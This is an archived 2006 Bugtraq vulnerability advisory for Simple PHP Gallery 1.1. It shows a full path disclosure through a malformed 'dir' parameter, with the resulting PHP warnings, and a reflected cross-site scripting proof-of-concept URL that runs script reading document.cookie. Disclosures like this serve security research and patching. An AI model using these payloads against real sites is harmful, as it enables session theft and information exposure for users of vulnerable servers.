Cross site scripting & fullpath disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Cross site scripting & fullpath disclosure
From: saudi@xxxxxxxxxx
Date: 24 Nov 2006 01:42:31 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                               
  ;;ii,,::                                              +
+                                                 ::::            ::            
  ;;tt;;::                                              +
+                                                 ;;::          ..,,::          
  ;;ii,,::                                              +
+                           ,,,,                ii;;,,          ii;;::          
  ;;ii,,::                                              +
+                           ii::                tt;;,,        ..tt;;,,..        
  ;;ii;;::                                              +
+                         ii,,::                ttii,,        ..ff;;;;::        
  ;;ii;;::                                              +
+                         tt;;::..,,            tt;;,,          ff;;;;ii        
  ;;ii,,::                                              +
+                         tt;;::;;::            tt;;,,..        jj;;,,..        
  ;;tt,,::                                              +
+                         tt;;;;,,              tt;;,,..        tt;;;;          
  ;;ii;;::                                              +
+                     ..::,,;;,,                tt;;,,..        tt;;,,          
  ;;ii,,::                                              +
+                 ..::,,ii;;;;..                tt;;,,..        iiii,,::        
  ;;ii,,::                                              +
+               ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::        
  ;;ii,,::                                              +
+             ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::        
  ;;ii;;::                                              +
+           ;;;;::      tt;;::                  tt;;;;..          ff;;::        
  ;;tt,,..                                              +
+         ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,        
  ;;ii,,..                                              +
+       ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,        
  ;;ii;;..                                              +
+       tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,        
  ;;ii,,..                                              +
+       jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,        
  ;;ii,,..                                              +
+       ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,        
  ;;ii;;..                                              +
+           ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,        
  ;;ii,,..                                              +
+                       iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,        
  ;;ii;;                                                +
+                       ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::        
  ;;ii,,                                                +
+                         jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;          
  ;;ii,,                                                +
+                           jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::          
  ;;ii::                                                +
+                             iijjjjjjtt;;            ;;ffffjjjjtt::            
  ;;ii                                                  +
+                                                           ;;..                
  ii;;                                                  +
+                                                                               
  ..                                                    +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker                                                     
                                                        +
+                                                                               
                                                        +
+Script : Simple PHP Gallery 1.1                                                
                                                        +
+Impact : Cross site scripting & fullpath disclosure                            
                                                        +
+                                                                               
                                                        +
+                                                                               
                                                        +
+Fullpath disclosure :                                                          
                                                        +
+                                                                               
                                                        +
+http://localhost/sp_index.php?dir=[Somthingwrong]                              
                                                        +
+                                                                               
                                                        +
+Result                                                                         
                                                        +
+                                                                               
                                                        +
+                                                                               
                                                        +
+Warning: opendir(123): failed to open dir: No such file or directory in 
/var/www/html/gallery/sp_helper_functions.php on line 10       +
+                                                                               
                                                        +
+Warning: readdir(): supplied argument is not a valid Directory resource in 
/var/www/html/gallery/sp_helper_functions.php on line 11    +
+                                                                               
                                                        +
+Warning: Invalid argument supplied for foreach() in 
/var/www/html/gallery/sp_def_vars.php on line 147                               
   +
+                                                                               
                                                        +
+                                                                               
                                                        +
+                                                                               
                                                        +
+                                                                               
                                                        +
+Cross Site Scripting                                                           
                                                        +
+                                                                               
                                                        +
+                                                                               
                                                        +
+                                                                               
                                                        +
+dir variable is not probrely verified and can be used to execute html and 
javascript code                                              +
+                                                                               
                                                        +
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>      
                                                        +
+                                                                               
                                                        +
+/Milw0rm                                                                       
                                                        +
+                                                                               
                                                        +
+                                                                               
                                                        +
+in subject hot :  Cross site scripting & fullpath disclosure  ;)               
                                                        +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Prev by Date: Re: Cracking String Encryption in Java Obfuscated Bytecode
Next by Date: mmgallery Multiple vulnerabilities
Previous by thread: RE: Cracking String Encryption in Java Obfuscated Bytecode
Next by thread: Re: Cross site scripting & fullpath disclosure
Index(es):
- Date
- Thread